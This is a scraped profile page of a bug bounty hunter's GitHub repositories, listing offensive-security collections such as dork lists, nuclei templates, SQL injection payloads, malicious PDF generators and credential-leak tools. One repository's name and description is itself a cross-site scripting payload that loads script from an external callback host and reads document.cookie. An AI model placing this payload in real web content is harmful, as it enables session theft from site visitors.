HUNTER (SaFiSec)

SaFiSec

Geek Repo

Company:Ethical Hacker | Bug Bounty Hunter

Location:internet

Home Page:https://www.youtube.com/@SaFiSec

Github PK Tool:Github PK Tool

HUNTER's repositories

40k-nuclei-templates

40,000+ Nuclei templates for security scanning and detection across diverse web applications and services

Stargazers:1Issues:0Issues:0

API-s-for-OSINT

List of API's for gathering information about phone numbers, addresses, domains etc

License:CC0-1.0Stargazers:1Issues:0Issues:0

Awesome-Cybersecurity-Handbooks

A huge chunk of my personal notes since I started playing CTFs and working as a Red Teamer.

License:GPL-3.0Stargazers:1Issues:0Issues:0

awesome-shodan-queries

🔍 A collection of interesting, funny, and depressing search queries to plug into shodan.io 👩‍💻

License:CC0-1.0Stargazers:1Issues:0Issues:0

Bug-Bounty-Dork

Bug Bounty Dorks For World Wide Websites

License:MITStargazers:1Issues:1Issues:0

bug-bounty-platforms

A community-powered collection of all known bug bounty platforms, vulnerability disclosure platforms, and crowdsourced security platforms currently active on the Internet.

License:CC0-1.0Stargazers:1Issues:0Issues:0

Leaked-Credentials

how to look for Leaked Credentials !

Stargazers:1Issues:0Issues:0

malicious-pdf

💀 Generate a bunch of malicious pdf files with phone-home functionality. Can be used with Burp Collaborator or Interact.sh

License:BSD-2-ClauseStargazers:1Issues:0Issues:0

scan4all

Official repository vuls Scan: 15000+PoCs; 23 kinds of application password crack; 7000+Web fingerprints; 146 protocols and 90000+ rules Port scanning; Fuzz, HW, awesome BugBounty( ͡° ͜ʖ ͡°)...

Language:GoLicense:BSD-3-ClauseStargazers:1Issues:0Issues:0

-script-src-https-xss.report-c-lover-script-

'/;//"><script src=https://xss.report/c/lover></script> <img src="data:image/png;base64,iVBORw0KGgo=" onerror="prompt(document.domain)"> <img src="data:image/png;base64,iVBORw0KGgo=" onerror="prompt(document.cookie)">

Stargazers:0Issues:0Issues:0

800-Bug-Bounty-Programs

Asset inventory of over 800 public bug bounty programs.

License:MITStargazers:0Issues:0Issues:0

Affinity

Free 2D symbols for computer network diagrams

License:UnlicenseStargazers:0Issues:0Issues:0

awesome-android-security

A curated list of Android Security materials and resources For Pentesters and Bug Hunters

License:MITStargazers:0Issues:0Issues:0

Awesome-Dorks

Dorks for Bug Bounty Hunting

License:GPL-3.0Stargazers:0Issues:0Issues:0

bug-bounty-dorkss

List of Google Dorks for sites that have responsible disclosure program & bug bounty program

Stargazers:0Issues:0Issues:0

Conferences

Conference slides

Stargazers:0Issues:0Issues:0

fuzzuli

fuzzuli is a url fuzzing tool that aims to find critical backup files by creating a dynamic wordlist based on the domain.

License:MITStargazers:0Issues:0Issues:0

gitGraber

gitGraber: monitor GitHub to search and find sensitive data in real time for different online services such as: Google, Amazon, Paypal, Github, Mailgun, Facebook, Twitter, Heroku, Stripe...

License:GPL-3.0Stargazers:0Issues:0Issues:0

google-dorks-bug-bounty

A list of Google Dorks for Bug Bounty, Web Application Security, and Pentesting

License:MITStargazers:0Issues:0Issues:0
License:GPL-3.0Stargazers:0Issues:0Issues:0
Stargazers:0Issues:0Issues:0

Mindmap

This repository will contain many mindmaps for cyber security technologies, methodologies, courses, and certifications in a tree structure to give brief details about them

Stargazers:0Issues:0Issues:0

OFFAT

The OWASP OFFAT tool autonomously assesses your API for prevalent vulnerabilities, though full compatibility with OAS v3 is pending. The project remains a work in progress, continuously evolving towards completion.

License:MITStargazers:0Issues:0Issues:0

One-Liners

A collection of awesome one-liners for bug bounty hunting.

Stargazers:0Issues:0Issues:0

PDF-Exploits

this repo contains all types of pdf exploits..

Stargazers:0Issues:0Issues:0

scrapts

Scrapts Scrapts Scrapts

Stargazers:0Issues:0Issues:0

Shodan_Dorks

Shodan Dorks

Stargazers:0Issues:0Issues:0

SQLI-PAYLOAD

Header Based SQLi's Payloads

Stargazers:0Issues:0Issues:0

vapi

vAPI is Vulnerable Adversely Programmed Interface which is Self-Hostable API that mimics OWASP API Top 10 scenarios through Exercises.

Language:HTMLLicense:GPL-3.0Stargazers:0Issues:0Issues:0

XXElixir

This tool is designed to test for file upload and XXE vulnerabilities by poisoning XLSX files.

Stargazers:0Issues:0Issues:0